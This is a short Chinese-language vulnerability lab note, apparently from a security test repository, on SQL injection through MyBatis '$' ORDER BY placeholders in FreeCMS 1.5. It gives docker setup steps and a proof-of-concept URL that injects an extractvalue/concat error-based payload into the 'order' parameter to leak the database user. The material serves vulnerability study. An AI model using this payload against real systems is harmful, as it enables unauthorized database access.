测试环境

编译及运行环境：

docker-compose build
docker-compose up -d

mybatis sql注入问题

Mybatis框架下SQL注入漏洞面面观 审计mybatis的sql注入

freecms 最新版 1.5 存在的sql注入漏洞

使用mybatis框架，一般并不会手动去写每一个xml配置，而是使用插件自动生成，而插件生成的xml中，默认情况下order by使用的是$占位符。如果应用层不做用户输入过滤，是存在sql注入漏洞的。

默认的xml配置：

POC

访问 http://127.0.0.1:8080/register.jsp 注册一个普通用户。然后通过http://127.0.0.1:8080/mlogin.jsp登录。

访问：http://127.0.0.1:8080/member/creditlog_list.do?order=extractvalue(1,concat(0x7C,(select%20user()),0x7C))